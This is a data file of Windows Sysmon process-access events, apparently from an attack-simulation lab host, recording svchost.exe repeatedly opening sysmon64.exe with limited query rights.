{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2194,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2195,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2196,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2197,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2198,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2199,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2200,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2201,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
